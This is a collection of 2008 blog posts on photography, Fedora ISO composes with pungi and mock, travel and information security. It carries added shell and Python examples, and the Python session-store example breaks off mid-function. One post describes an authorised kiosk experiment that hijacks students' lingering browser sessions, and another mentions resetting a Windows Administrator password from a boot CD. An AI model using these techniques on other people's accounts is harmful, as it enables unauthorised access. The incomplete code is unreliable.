I will often just blog directly from Flickr, what I like about this is that it will organize the photo on the top right hand corner and wrap the text around the photo, or sometimes I will blog from Wordpress and add the medium sized photo to the post and clicking on it will take you to the Flickr page though I might change it in the future so that it stays on my blog and doesn’t go directly to Flickr.

Monitor calibration can turn out to be a problem. I’ve noticed this from seeing the photos on my desktop at home, where I’ve attempted to calibrate the monitor as best as possible, on my work computer, which has not been calibrated at all, and on my mom’s computer, where I had to play a little with the color correction in the nVidia control panel in order to get the images to look like they should, though I’m still not completely happy with that.

I guess the biggest issue for digital photography is the monitor calibration and this is a big factor that affects the way others see our photos. As of right now I’m really happy with the setup I have and find it quite affordable for my budget. I have even done a similar setup for my sister, she’s no photographer, but she likes to draw and would like to show off her work as well so I’ve set it up and you can check it out on her blog that I made…I still have to teach her to upload to Flickr.

What would I change? Well, so far not much really... though I'd like to add a drop shadow to the photos in FAlbum that works well with the current theme I have set, and that would be pretty much it right now.

Pascal Wowak said that he believes watermarks on images ruin them, and I have to agree with him up to a certain level. There are people who simply don't want anyone else to use their work, so they put a huge watermark across the photo, which sure protects it but also ruins the photo a lot. Then there are people who make a very good-looking watermark, like Melissa Jill, which looks so artistic. The watermark I use is a simple small black line at the bottom of my photos, an idea I took from my friend ocnarfid ;)

I also like the idea of having a border added to the image that carries the signature, like the one from Jasmine Star, since it's non-intrusive on the photo, but I find that, at least for myself, it would add a lot of work.

I also just post the finished work and not some raw photo which I haven't even taken a look at. I like to do little to no retouching to the photo unless I consider that it would really come out great with certain effects applied. Most of the time I'll just make the photo black and white or just leave it in color.

-LM

by Luis Murillo at May 06, 2008 07:47 PM

Rob's Musings

Posting code made easier (for everybody else reading your blog!)

I've noticed something while reading my daily blogs: a lot of code is just unreadable, because most blog systems (Blogger, looking at you) screw up indentation unless you wrap it in a pre tag (opening and closing tags are both required). This makes it readable for your readers! I've left comments on the blogs that didn't know this, and now they do.

This message is primarily for the Google Summer of Code students, but is useful to the programming community as a whole. When you post code, wrap it in a pre tag and be sure to close it when your code example is complete.

by Robert O'Connor (noreply@blogger.com) at May 06, 2008 04:37 PM

May 05, 2008

Code|Beta

Paintball Sunday

This past Sunday I went to I.D.T. Paintball with my coworkers and some friends of theirs to play a good game of paintball. It was sunny, hot and dry, which caused me to get sunburned on my hands and the back of my neck, but it sure was worth it since we had a great time.

I didn’t take my camera because I like to play paintball a lot, so I knew that I wouldn’t take photos, but a friend took his Nikon D40 to take some shots and I took the time to give it a test run and get some shots. I really like the one of Venny, a coworker, that I took, which you can see at the end of this post. This was taken during the lunch break we took. We had bought meat at the supermarket beforehand to grill during lunch.

Afterwards we went to the go-kart tracks to run around a few times. At the end of the day we were so tired that we all decided to go home.

-LM

by Luis Murillo at May 05, 2008 10:19 PM

May 04, 2008

Random Thoughts of Jon

Pungi and mock for fun and profit!

Alright, well maybe not profit, but certainly fun!

I had mentioned in a previous post about doing QA for Fedora, and having installation CD and DVD sets available prior to the general release of the distribution. All the Fedora Alpha, Beta, and Preview Releases really are is snapshots of rawhide, the daily development tree of Fedora. Sometimes it might be useful to have a DVD of the current rawhide, similar to what Fedora release engineering would produce. Now, I'm going to give a step-by-step of how to do this in 'mock', which is a program that you can use to manage chroots. Mostly it's used for building binary RPMs from source RPMs; however, it has recently grown functionality that makes it useful for doing composes.

There are some things that pungi depends upon that make it very suitable to be run in a mock chroot. First, the distribution that you are composing and the distribution that you are composing on have to be the same; for instance, if you wish to compose rawhide, you have to be running rawhide (or at least have a rawhide userspace). Also, the architecture that you are composing on and the arch that you are composing must be identical (you can't compose i386 on an x86_64 system, for example). Mock allows us to overcome both of these limitations (at least for compatible arches, i.e. x86_64 and i386). A mock chroot can have a userspace that is very different from the host system, and so long as the arches are compatible, it can even be of a different arch (i.e. you can run i386 code on x86_64, but not the other way around, obviously).

The only thing we have to do on the system that is going to produce the trees is install the 'mock' RPM. This is as simple as typing 'yum install mock' at the command line. On my system, I also prefer to have the bash-completion package installed, because mock is 'completable' by that package, and the buildroot names can get kinda long sometimes (or am I just lazy?) :). After this is done, you need to make sure that the user who needs to use mock is in the 'mock' group. This matters because being able to use mock is equivalent to having root on the machine in question, since mock is SUID (and has to be). You can accomplish this with 'gpasswd -a jstanley mock', for example.

The next thing we need to do is initialize the chroot. This is very simply done with 'mock -r (config) --init'. This brings up the question of which mock configuration to use. Mock comes with a number of pre-made configuration files; the ones you're most likely to want are 'fedora-rawhide-i386' or 'fedora-rawhide-x86_64'. These files live in /etc/mock, and the -r argument to mock takes them WITHOUT the trailing .cfg extension. If this is your first time running mock for this installroot, it will use yum to install the group 'buildsys-build' into the chroot. After that is done, it will tar up the root and save it for future use. If you had used this installroot before, it would clean it (i.e. delete everything that was there), untar the root cache, and then run yum update to get items that have changed since the root cache was created.

Now that we have a chroot with the desired content in it, we can install pungi. Wait a minute, this is a chroot (and yum is not installed in it by default), so how do I do that? Good thing mock has the '--install' option. So you just execute 'mock -r fedora-rawhide-x86_64 --install pungi'. It won't output much at all, but it will install pungi and its chain of dependencies. Now that we have pungi installed, we're ready to actually use it in the chroot! So let's get a shell in the chroot with 'mock -r fedora-rawhide-x86_64 --shell', which will give you the following output:

[jstanley@rugrat ~]$ mock -r fedora-rawhide-x86_64 --shell
INFO: mock.py version 0.9.7 starting...
State Changed: init plugins
State Changed: start
State Changed: lock buildroot
mock-chroot>

The 'mock-chroot>' is my shell prompt, reminding me that I am in the chroot. From here, we can use pungi. The reference kickstart files that release engineering uses to create the releases are included in the fedora-release package and can be found in the /usr/share/fedora-release directory. The traditional DVD configuration, which is what you want to use, is called f9-fedora.ks (note that this just landed in the fedora-release package on Friday). One piece of housekeeping that needs to be done at this point is to remove the generated rpm database files. If you are building on your native arch, this isn't strictly necessary but is still a good idea. If you are building i386 images on x86_64, not doing this is fatal.

mock-chroot> rm -f /var/lib/rpm/__db.00*

At this point, we can execute the pungi command:

mock-chroot> pungi -c /usr/share/fedora-release/f9-fedora.ks --destdir=/compose --nosplitmedia --nosource

I'll take you through what these options do:

-c - what kickstart file you want to use for this compose

--destdir= - where the compose should happen. It's important to note that this is different from where on the non-chrooted filesystem you'll find it; remember that we're operating in a chroot here.

--nosplitmedia - I do not wish to generate split (CD-sized) media for this compose

--nosource - I don't want to gather source code for this compose. Note that you MUST NOT use this option if you plan on distributing the resulting discs. Note also that dropping this option alone will not create source ISOs; that's an additional step that I'll mention below.

When you enter this command, pungi will go about four phases of operation:

- Gather the RPMs and SRPMs as required
- Create a yum repo out of those
- Run the anaconda 'buildinstall' tool to generate installation images, etc.
- Create ISOs

Using a local mirror and a reasonably fast computer, this will take about 30 minutes. Note that every RPM that would be included on the DVD is downloaded, so having a local mirror REALLY helps here. Not a show-stopper if you don't have one, but it will take longer than 30 minutes :). One word of warning, though: when the compose gets to the point of running buildinstall, it will look like it's hung; this is the longest part of the compose. So if you see something like this and nothing more on your screen, it will finish:

Pungi.Pungi:INFO: Running /usr/lib/anaconda-runtime/buildinstall --product Fedora --version 20080503 --release "Fedora 20080503" --bugurl http://bugzilla.redhat.com /compose/20080503/x86_64/os

OK, so eventually, you'll see the following (among other things):

Pungi.Pungi:INFO: Running /usr/bin/sha1sum Fedora-20080503-x86_64-DVD.iso
Pungi.Pungi:INFO: Running /usr/bin/sha1sum Fedora-20080503-x86_64-netinst.iso
Pungi.Pungi:INFO: CreateIsos is done.
All done!

At this point, the DVD and netinst ISOs have been created and are inside our chroot. To get at the chroot from the non-chrooted OS, it's located in /var/lib/mock/fedora-development-$YOURARCH/root, so everything that you did is located there. You can find the completed ISOs in /var/lib/mock/fedora-development-x86_64/root/compose/20080503/x86_64/iso, for example.

I said earlier that source ISOs are not created by default as part of the Create ISOs stage. In order to create them, you need to run pungi again against the same tree. Here's the syntax for doing that:

mock-chroot> pungi -c /usr/share/fedora-release/f9-fedora.ks --destdir=/compose --sourceisos --nosplitmedia

Again, drop the --nosplitmedia option if you want CD-sized ISOs created as well.

by Jon Stanley (noreply@blogger.com) at May 04, 2008 12:26 AM
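Jon's steps above, scripted end to end. This is an added example for this page, not code from Jon's post, pungi or mock. It assumes mock's default chroot base of /var/lib/mock, that the config file names the chroot with a config_opts['root'] line (the post shows that directory as fedora-development-x86_64 for the fedora-rawhide-x86_64 config, so the name is read from the file rather than guessed), that mock's --chroot option runs a single command inside the chroot, and that pungi names the tree after today's date as in the log above. The first pungi pass is the --nosource compose from the post; --with-source runs the second --sourceisos pass, and --split leaves out --nosplitmedia. The script refuses to run unless the user is in the mock group, since that group is root-equivalent, and it removes the stale rpm database files before every pungi run so the i386-on-x86_64 case doesn't fail.

```shell
#!/bin/sh
# compose-in-mock.sh: script the rawhide compose walked through above.
# Added example for this page, not part of pungi or mock. Assumptions are marked.
set -eu

MOCK_ROOT_BASE=${MOCK_ROOT_BASE:-/var/lib/mock}   # assumption: mock's default basedir
MOCK_CFG_DIR=${MOCK_CFG_DIR:-/etc/mock}

# arch_of CONFIG: the arch is the last '-' separated field of the config name,
# e.g. fedora-rawhide-x86_64 -> x86_64
arch_of() {
    printf '%s\n' "${1##*-}"
}

# chroot_root_name CFGFILE CONFIG: the chroot directory under $MOCK_ROOT_BASE is
# named after config_opts['root'] in the .cfg, which for the rawhide configs differs
# from the config name (fedora-development-x86_64 for fedora-rawhide-x86_64).
# Falls back to CONFIG when the file has no such line.
chroot_root_name() {
    name=$(sed -n "s/^config_opts\['root'\][[:space:]]*=[[:space:]]*'\([^']*\)'.*/\1/p" "$1" 2>/dev/null | head -n 1)
    printf '%s\n' "${name:-$2}"
}

# pungi_args KS DESTDIR SOURCE SPLIT: build the pungi argument list.
#   SOURCE: none (--nosource, first pass) | isos (--sourceisos, second pass)
#   SPLIT:  yes (CD-sized media too) | no (--nosplitmedia)
pungi_args() {
    ks=$1; dest=$2; source=$3; split=$4
    args="-c $ks --destdir=$dest"
    case $source in
        none) args="$args --nosource" ;;
        isos) args="$args --sourceisos" ;;
        *) echo "pungi_args: bad source mode '$source'" >&2; return 1 ;;
    esac
    [ "$split" = yes ] || args="$args --nosplitmedia"
    printf '%s\n' "$args"
}

# iso_dir ROOTNAME DESTDIR VERSION ARCH: host-side path of the finished ISOs
iso_dir() {
    printf '%s\n' "$MOCK_ROOT_BASE/$1/root$2/$3/$4/iso"
}

# in_mock_group: membership in 'mock' is root-equivalent, so refuse to go on without it
in_mock_group() {
    case " $(id -Gn) " in *" mock "*) return 0 ;; *) return 1 ;; esac
}

main() {
    cfg=$1; shift            # e.g. fedora-rawhide-x86_64
    ks=${KS:-/usr/share/fedora-release/f9-fedora.ks}
    dest=${DESTDIR:-/compose}
    split=no; with_source=no
    for opt in "$@"; do
        case $opt in
            --split) split=yes ;;
            --with-source) with_source=yes ;;
            *) echo "usage: $0 CONFIG [--split] [--with-source]" >&2; exit 2 ;;
        esac
    done
    in_mock_group || { echo "$(id -un) is not in the mock group (gpasswd -a USER mock)" >&2; exit 1; }
    [ -f "$MOCK_CFG_DIR/$cfg.cfg" ] || { echo "no $MOCK_CFG_DIR/$cfg.cfg" >&2; exit 1; }

    arch=$(arch_of "$cfg")
    rootname=$(chroot_root_name "$MOCK_CFG_DIR/$cfg.cfg" "$cfg")
    version=$(date +%Y%m%d)   # assumption: pungi versions the tree by today's date, as in the log

    mock -r "$cfg" --init
    mock -r "$cfg" --install pungi
    # Stale rpm db environment files are fatal when composing i386 on x86_64, so drop them
    # first. --chroot runs one command inside the chroot (assumption: available in your mock).
    mock -r "$cfg" --chroot "rm -f /var/lib/rpm/__db.00* && pungi $(pungi_args "$ks" "$dest" none "$split")"
    if [ "$with_source" = yes ]; then
        mock -r "$cfg" --chroot "rm -f /var/lib/rpm/__db.00* && pungi $(pungi_args "$ks" "$dest" isos "$split")"
    fi
    echo "ISOs: $(iso_dir "$rootname" "$dest" "$version" "$arch")"
}

# Run only when executed under this name, so the functions can also be sourced.
case ${0##*/} in compose-in-mock.sh) main "$@" ;; esac
```

Usage: `./compose-in-mock.sh fedora-rawhide-x86_64 --with-source` reproduces both pungi runs from the post and prints where the ISOs landed on the host; override KS or DESTDIR in the environment for a different kickstart or compose directory.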

May 03, 2008

Code|Beta

Rob's Musings

Groovy 1.6-beta-1 released!

So, I read that Groovy released 1.6-beta-1. They kept the mixins syntax that was added. I love the new syntax; it's easy to use and concise as well.

Congrats to the Groovy team! Great Job!

by Robert O'Connor (noreply@blogger.com) at May 03, 2008 01:50 AM

May 02, 2008

Code|Beta

RE: Off to EDUCAUSE/Internet Security Professionals

I read Kees’ post on traveling and I must agree with him, because it’s quite a hassle to travel through US airports nowadays, and even worse if what I heard over at Digg is true. I heard that the FBI is copying some hard drives of passengers who carry laptops.

Before you go and beat me up about believing everything I see on Digg: whether this is true or not, I’m sure going to keep this in mind next time I’m traveling to the US. I’ve traveled into the US a couple of times with my laptop, and having to take the laptop out at every security check is enough of a hassle for me, and even worse if they want to copy the contents of my hard drive.

I agree on traveling light... but that’s too light for me. Besides all the trouble one has to go through in airports, I’d still carry my laptop. I want to get one of those Asus Eee PCs to just have access to the Internet and to my home network, and I’m all set; no need to carry anything else besides that... well, with the exception of my clothing, of course :D

-LM

by Luis Murillo at May 02, 2008 09:59 PM

Kees Leune

Off to EDUCAUSE/Internet Security Professionals

I am heading off to the EDUCAUSE/Internet2 security professionals conference this weekend. The event starts Sunday and completes Tuesday around noon. While getting my packing list checked off (business cards, itinerary, confirmations, reservations, schedule, etc) I was getting ready to pack my laptop, power supply, cable lock, external drive, etc.

Then I stopped.

Why would I carry all this stuff?

I consider myself an experienced traveler and I have visited a fair number of conferences all over the world. Traveling is annoying enough; I do not need anything that is non-essential.

After all, what I do not carry, I cannot lose. True, having access to email would be nice (I'm not on Crackberries), and web browsing would be convenient too, but face it: I am in session Sunday from 8.30am till late (hopefully there will be some good BoF sessions), Monday starts even earlier (7am) and might end even later, and Tuesday I'll be checking out of the hotel and traveling back home. When would I even have time to get my e-fix?

Traveling in general, and navigating public transportation (incl. clearing airports) is much easier without carrying a lot of stuff.

So, what will I be taking in addition to some fresh clothes? A stack of business cards, my cell phone (with charger), my notepad and one pen.

by Kees at May 02, 2008 07:58 PM

Random Thoughts of Jon

Hello Lazyweb: GUI MySQL "IDE"?

I want a GUI in which I can write and run MySQL queries. For anything more than trivial work, the MySQL CLI client just doesn't cut it. A way to check out table structure graphically would be nice, too.

I'm not a MySQL expert by any stretch of the imagination, so maybe there's something that I should Just Know About(TM), or is MySQL lacking such a basic tool?

by Jon Stanley (noreply@blogger.com) at May 02, 2008 03:09 PM

Code|Beta

City Lights




San Jose, CR

Originally uploaded by tenshi_cr

This is my attempt at some long exposure photography. This shot was taken from the parking lot of Pricesmart in Heredia, CR. The city you see the lights coming from is San Jose, the capital of Costa Rica.
I took this one using my 70-300mm lens since it has the lens hood. The first try at this shot was done with my 18-55mm lens, but there was a strong light coming from a street light nearby that ruined the shot.
I’m not a huge fan of post-processing, but I did run this photo through a couple of actions in Adobe Photoshop CS3.
Any comments regarding the photo are welcome. Personally I think I should have either set the shutter speed to a faster time, lowered the ISO speed or lowered the aperture a bit, since I do see some color, especially from the lights, that bled; for example, if you pay close attention there are some lights that have a bluish halo around them.

-LM

by Luis Murillo at May 02, 2008 04:25 AM

May 01, 2008

Vitaliy

Technology Books and Home Users

In the past few months I have started making the transition from reading on my computer monitor to physical books, simply because my eyes cannot handle the strain of focusing on the monitor for hours. After reading a good deal of computer-related books I have started to notice an annoying pattern: authors and book publishers are trying to appeal to the wrong demographic. It does not matter how technical a subject may be, the author still attempts to write it from a home user perspective.

While reading the Server Technologies chapter in The Complete Reference: Networking, I found the author going on to discuss how servers are no different from workstations! The author suggests that you should buy a workstation and use it as a server, because the differences come down to servers simply lacking audio and video cards, having higher prices, and lacking the free peripherals! Here are some fun quotes from the chapter:

“The question then remains, what you do get when you purchase a server for more money than you would spend on a workstation with the same processor and a comparable amount of memory and disk space?”

“Although servers generally do not come equipped with high-end video and audio adapters, there is usually no reason why you can’t add them later and use the computer for tasks more traditionally associated with client workstations.”

This is not about me not liking some book and deciding that I should rant about it. Overlap of home and enterprise technologies exists in the majority of books that are not directly published by the software or hardware manufacturers. The reader does not buy a reference book on networking to read about networking topologies, routing protocols, and how to convert their home PC into a server! Instead the reader wants insight into an industry, platform, hardware, or software that is not readily available to them. In other words, when buying a 500+ page book on firewalls, I am not buying it to read about Zone Alarm. In fact, Zone Alarm and Cisco PIX should not be mentioned in the same chapter.

I am now becoming one of those people that hangs around Barnes & Noble for hours, reading chapters from random books before making a purchase.

by vitaliy at May 01, 2008 05:30 PM

Code|Beta

May Challenge from PhotoChallenge


Waiting for water to boil

Originally uploaded by tenshi_cr

So I decided to join the PhotoChallenge group on Flickr. The group basically chooses a subject each month and you would upload a photo every day sticking to the subject.
The idea of these challenges is to make you get better at taking photographs. This is my first entry into May’s challenge. The theme will be different objects and it will change each week. This week is beverages, and I’ve decided to stick with tea this week.
One of the areas I’m not that good at and definitely need improvement in is low light environments.

-LM

by Luis Murillo at May 01, 2008 02:51 AM

Random Thoughts of Jon

PATH Service Shutdown on 33rd Street Line

Well, there was apparently a small manhole fire just east of the Christopher Street station in Manhattan today. Depending on which news report you believe, it supposedly started underneath a PATH train! All of the passengers were evacuated, and there were no injuries.

Anyhow, what does this have to do with me? I take the PATH in order to commute to Manhattan when the job requires it. Today was such a day that I had to work in our lower Manhattan office, nowhere near to where this commotion occurred. However, there was a NYLUG meeting this evening, which happens in midtown. It's easiest (I think) for me to take the PATH from midtown when I'm in midtown. Makes sense. Good thing that I knew the service was shut down ahead of the meeting in midtown, so I knew that was a no-go. Everyone was saying "Wow, we feel really sorry for the folks that live in Jersey, they're gonna have one heck of a commute tonight". Fearing the worst, I took the NYC subway down to the WTC PATH station, and hopped on the train there. I think that they had increased service frequency to that station as much as they could, since there was a train waiting for me at 10PM, and it left shortly thereafter (with the train operator telling everyone that was getting on the train that there were plenty of seats in the rear of the train - problem being everyone needed to be towards the front because of where they were going). The train got quickly underway, and I think that I got into the subway at 9:45PM or something similar, and I got out of my station in NJ at 10:20PM. 35 minutes is not a bad commute for NYC, especially since I took a massive detour from where I was in order to get home. There are people that would kill for that commute, and that's what I get when everything's messed up. So I guess this PATH commuter had some good luck!

It's unclear whether or not this will be repaired for the morning rush, so I'm planning to leave a little early, since the route that I take is the only one operating between NJ and NY, and I'm expecting more crowding on the already jam-packed train. Good thing the customer meeting was relocated (for unrelated reasons) from midtown to downtown! :)

by Jon Stanley (noreply@blogger.com) at May 01, 2008 01:05 AM

April 30, 2008

preed's blah-blah-blahg

The Changing of the Guard

Almost four weeks ago now[1], dbaron took some time and separated out the various guts of the old Mozilla tools module, and divvied the contents of the directory[2] into two new Mozilla modules: a Build & Release Tools module and a Code Analysis and Debugging Tools module.

I wanted to call this change out, because I think it's a step in the right direction, for a lot of reasons; both of these new modules have seen a lot more activity in the last 2-3 years and I think it really helps to separate them out from a code management standpoint, but also from the standpoint of the way we think about these sets of tools: the guts of any organization's build/release infrastructure and analysis/debugging tools should be first-rate citizens, and this change helps to frame the way those parts of the code are thought about.

So, thank you, dbaron; it's been a long time coming, and I appreciate you taking the time to sort that goop of code all out into [more] logical units.

***
A couple of days after the announcement, I brought up the fact that, with Rob Helmer's announcement, the Build & Release module would not have anyone at Mozilla Corporation who could offer reviews for the module, given that rhelmer, Chase and I were listed as the owners, and there weren't any peers yet.

This obviously makes little-to-no sense.

After a lively discussion about how to best remedy that, I also wanted to note that long-time Mozilla community member Nick Thomas[3] is the new module owner for the Build/Release Tools module, with Chase, Rob Helmer, and myself staying around as peers.

Coop was also added as a module peer, whose omission was, let's face it, somewhat ludicrous[4]. I'm happy to see that got corrected as well.

Congratulations, Nick; you follow a long line of Mozilla Build Engineers, and I know you're going to [continue to] hit it out of the ballpark.

Let me know where to send the bottle of scotch.

_____________________
[1] Wow... on my birthday, no less! What a present! :-)
[2] which had mostly become an "island of misfit code"
[3] also known as the "Build Engineer Formerly Known as CF"
[4] No one escapes Mozilla Build/Release, Coop. No one. ;-)

April 30, 2008 03:48 AM

Kees Leune

EDUCAUSE/Internet2 Security Professionals Conference

For those of us in higher education; do not forget that the EDUCAUSE/Internet2 Security Professionals Conference will take place starting this Sunday (May 3). If anyone is going there and would like to meet up, please drop me a note! I'll be getting in Saturday evening around 8pm or so.

by Kees at April 30, 2008 12:41 AM

April 29, 2008

Code|Beta

Kees Leune

Trust, but verify

Someone asked me today if I had contacts in Law Enforcement in The Netherlands. As a matter of fact, I do. The guy (who I only know by his online alias, and "met" only once) wanted me to contact them so I could inform them of a warez site that he knew about, and of a web site that was defaced by the person who operates that site.

However, when I asked the person for some evidence to back up his claims, he went quiet. All he told me was that "he knew about, but was not connected to the site that was defaced". Obviously, it ended right there for me.

It does make you wonder: why does anyone think that I would go to anyone (let alone a law enforcement officer) with a message like: hey, this guy I never met, or have any idea who he really is, would like you to crack down on a site that he claims hosts illegal stuff, but for which he cannot provide any corroborating evidence?

Uhuh.

by Kees at April 29, 2008 01:07 AM

April 28, 2008

Code|Beta

The camera doesn’t make the photographer

There is one thing that some people think, and that is that the more expensive the camera, the better the photos that person takes. This is not the case, since the camera is only a tool that, like every other tool, needs to be used correctly to achieve the desired results. I must agree that the better the tool, the better the result, and taking photos with a camera phone, for example, is not something you would compare with photos taken with a Nikon D3.

There is one phrase that I’ve heard and probably have mentioned here a couple of times, and that is that the camera doesn’t make the photographer. Given the right usage of the tool you can actually achieve great photos or snapshots, and many professional photographers as well as hobbyists and enthusiasts have shown this to be true in numerous blogs and contests that have been carried out.

One of these photographers is Jeff Ascough, who takes a Sony Ericsson K800i, goes out to take some photos, then takes them into the Digital Darkroom and touches them up to make them look better; you can see them in his post Camera Phones.

I’ve agreed with this phrase and these photographers since most of my great shots have been taken with my point-and-shoot camera.

-LM

by Luis Murillo at April 28, 2008 06:01 PM

Kees Leune

Information security framework

A 0day with an automatic discovery and dissemination tool shouldn't be a surprise to anyone. The fact that it's hit hundreds of thousands of sites in less than a couple of weeks is slightly surprising, though it mainly means that the bad guys are moving fast. Is this just the next step in Internet security, where we have new 0day vulnerabilities sweeping through web servers on a regular basis?
Source: Network Security Blog
Observations like this once more seem to reconfirm that the bad guys are increasingly focusing on OSI layer 7 and above. While not to be ignored, simply putting up a firewall to keep unwanted traffic out, and an IDS to make sure the firewall is working well (or an IPS, if you prefer), is not sufficient.
While hardening systems by applying patches (to the operating system as well as all applications) and limiting servers to only the services that are required remains critical to limit your technical exposure, malicious traffic traveling on legitimate channels remains effective.

So what can be done? It is essential that deciding what is desired behavior when it comes to using information is done ahead of time. Users must be educated about proper use of information technology. Processes that use our information must be designed in a way that they reasonably prevent undesired use, and that they behave predictably when they fail. We must develop an enterprise architecture that supports our processes effectively and efficiently. We must put monitoring controls in place to detect when (not if!) our preventative controls fail. We must be prepared and know how to respond when those failures are detected. Bottom line?

1. Develop and maintain information security policy
2. Design and maintain business processes
3. Develop and maintain user awareness
4. Develop and maintain an enterprise architecture that is aligned with the business processes
5. Implement a technical infrastructure based on the enterprise architecture
6. Monitor processes and infrastructure for signs of failure
7. Respond to incidents
8. Go to 1.

by Kees at April 28, 2008 02:57 PM

Embedded intelligence

xkcd has an excellent comic up today. The title is Zealous Autoconfig. Here it is:



Please respect their license.

by Kees at April 28, 2008 01:02 PM

Code|Beta

700mm lens and playground photos


Originally uploaded by tenshi_cr

My parents arrived last night from their trip to Panama, which unfortunately I was unable to go on, and along with the UV filter I had asked them to buy for me they brought me a new Nikkor 70-300mm G lens.
To test the range of this lens I went over to the terrace in my house and took this shot of the seesaw in the children’s playground across the street. This shot was taken at a focal length of 300mm and with my tripod, since the lens doesn’t have VR, Nikon's camera-shake reduction technology, which my 18-55mm has. I attempted to take some shots with the lens by simply holding the camera, but they didn’t come out, since my hand is a bit shaky and despite my tries at stabilizing the camera it would still blur the shot.
Since I don’t have a remote control for the camera, I set the timer to 5s to take the steady shot, and this works, so I’ll be sticking to it until I can buy the control.
I have also taken and posted on Flickr a couple of shots from the playground, using my 18-55mm lens, that I took today. All the images have been retouched in Adobe Photoshop CS3 using Kubota’s actions as well as other presets that I got for Adobe Lightroom.

-LM

by Luis Murillo at April 28, 2008 05:56 AM

April 27, 2008

Kees Leune

Setting account expiration in Windows XP

I ran into a problem yesterday with my Windows installation. Since this is a laptop that is not part of an Active Directory Domain, has the Administrator account disabled and only has one other local account with Local Admin privileges, I ran into a problem when Windows informed me that my account had expired.

The problem is that I had a whole bunch of EFS-encrypted files in that account, without having backed up the EFS-certificate. The only option that I thought would provide me with a quick fix was to reboot from a Backtrack CD to re-enable the Administrator account and blow out the password on the Administrator account. Removing the account of the other user would not have worked, but even worse, it would have made all my EFS-encrypted files unavailable.

After having regained access to the Administrator account, I started messing around with clicking on all kinds of stuff, and even playing with some wmic-voodoo.

All to no avail.

As with most operating systems, Windows separates account expiration from password expiration. Resetting the password expiration was easy, but resetting the account expiration on a stand-alone Windows machine does not seem to be possible with out-of-the-box Windows tools. Even a tweet for attention did not yield the result I was looking for.

After doing quite some head-banging and even more research, I found a command-line tool called AccExp. AccExp can set or reset the account expiration of a local windows user, or a user in an Active Directory.

Lesson 1: If using EFS, back up your certificate. Instructions.
Lesson 2: Account expiration cannot be reset using an out-of-the-box Windows install. Additional tools, such as AccExp, are required.
Lesson 3: Windows will not expire an account while you are logged in; even going to standby/hibernate does not trigger an account expiration check. Windows will only check when you log on to an account.

PS: Yes, I know this Windows laptop is configured pretty much as far removed from best-practices as possible.

by Kees at April 27, 2008 12:42 PM

April 26, 2008

Vitaliy

DNS Operations Workshop

Operations Analysis and Research Center for the Internet (OARCI) will hold its third annual DNS Operations Workshop at Brooklyn College this upcoming June. Registration is now open, and you do not have to be a member of OARCI to attend the workshop! Check out the OARCI DNS Operations Workshop website for more information!

by vitaliy at April 26, 2008 01:04 AM

April 25, 2008

Code|Beta

The world outside sleeps


The world outside sleeps

Originally uploaded by tenshi_cr

I attempted to shoot a good long exposure of the moon last night since it looked pretty good, but since I was attempting to do it from inside the house, the window caused the shot to not have enough detail and come out messed up.
I pointed the camera at the horizon and took a long exposure shot using my tripod and the camera timer set to 5 seconds to avoid camera shake.
Afterwards I used Adobe Lightroom to process the RAW file and to create a PSD file that I would use in Adobe Photoshop CS3 to add a couple of effects to the photo using the actions that I recently obtained.

-LM

by Luis Murillo at April 25, 2008 11:54 PM

April 24, 2008

Kees Leune

Be careful with what you leave behind

One of my responsibilities is security awareness training, and I am currently in the process of establishing a baseline. This will allow me to evaluate the effectiveness of any future efforts that I am going to develop. Whenever you embark on something like implementing a new program, make sure that you establish baselines. Without them, you will have no way to evaluate the effectiveness of your efforts. But, I digress.

Today, I re-confirmed that most attacks against IT infrastructure are just too simple to pull off when the attacker targets the users, rather than the technology. Today, I did an experiment using low-tech methods.

I went down to some public terminals, typically used by students when they have some time to kill. Whenever someone left their terminal, I walked over to see what I could find. Most were smart enough to close their browsers before they left, but very few went so far as to clear their browser's cache, or even actually log out of the application they were using.

Most web applications use a session-based cookie to authenticate a user and to establish a context. That session will be destroyed automatically when the last window of a browser closes. A well-written web application will then require the user to re-authenticate themselves. Note that many web applications are friendly enough that they will cache the user's identity, even across sessions. The login field is typically already populated, providing an attacker with useful information.

These particular kiosks are iMacs. Macs are interesting things in that windows completely disappear when they are minimized, except of course when you know where to look. I initiated my attack by starting an instance of Safari and an instance of Firefox, and I minimized both.

Next, I walked away from the browser and let students use the kiosk. Those students did their thing (usually browsing Facebook or MySpace) and then closed their window, but not their browser. As a result, the session states were maintained and I had full access to accounts logged in to these social networking sites, and even the occasional Google Checkout or eBay account.

Of course, I immediately logged the user out when I established that she was logged in and after I had taken a photo of the screen. I also made sure not to capture (or even look at) any personally identifiable information.

Please note that our policies allowed me to do this. My job function requires me to monitor the use of IT resources, and to establish an information security program, and establishing a baseline is part of that process. While connected to our network, or while using equipment that we own, no user has a "reasonable expectation of privacy."

How do you defend against this? Clear "private data" when you leave a browser in a public space. This will not defend against key loggers, but it will make it a lot harder for people to hijack your session.

Another thing that I found interesting is that nobody approached me to find out what I was doing there. I was very open about the fact that I would walk over immediately after someone left, play with their browser, and even take photos of their screen using the camera built into my cell phone.

by Kees at April 24, 2008 08:23 PM
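The mechanism Kees describes, a session cookie that outlives closed windows and an application that only forgets the user on explicit logout, as an added Python example that is not part of the original post: a minimal server-side session store whose Set-Cookie header deliberately carries no Max-Age, plus an idle and an absolute timeout (assumed policy values, not from the post) so an abandoned kiosk session dies on its own, and a `walkaway_scenario` helper over a constructed timeline that returns whom the server still believes is at the keyboard with and without the idle timeout.

```python
import secrets

IDLE_TIMEOUT = 15 * 60        # assumed kiosk policy: seconds without a request before expiry
ABSOLUTE_TIMEOUT = 8 * 3600   # assumed hard cap on session lifetime regardless of activity


class SessionStore:
    """Server-side session table keyed by an opaque cookie value (added example)."""
    def __init__(self, now, idle_timeout=IDLE_TIMEOUT, absolute_timeout=ABSOLUTE_TIMEOUT):
        self._now, self._idle, self._abs = now, idle_timeout, absolute_timeout
        self._sessions = {}

    def create(self, user):
        sid, t = secrets.token_urlsafe(32), self._now()
        self._sessions[sid] = {"user": user, "created": t, "last_seen": t}
        return sid

    @staticmethod
    def cookie_header(sid):
        # No Expires/Max-Age makes this a "session" cookie: the browser drops it
        # only when the whole browser process exits, not when a window closes.
        return f"Set-Cookie: sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"

    def resolve(self, sid):
        """Return the user bound to sid, or None if unknown or expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        t = self._now()
        if (self._idle is not None and t - s["last_seen"] > self._idle) or \
           (self._abs is not None and t - s["created"] > self._abs):
            del self._sessions[sid]   # expire server-side, whatever the cookie says
            return None
        s["last_seen"] = t
        return s["user"]

    def logout(self, sid):
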